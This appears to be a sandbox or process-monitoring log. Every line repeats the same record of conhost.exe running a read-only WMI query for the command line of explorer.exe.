Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
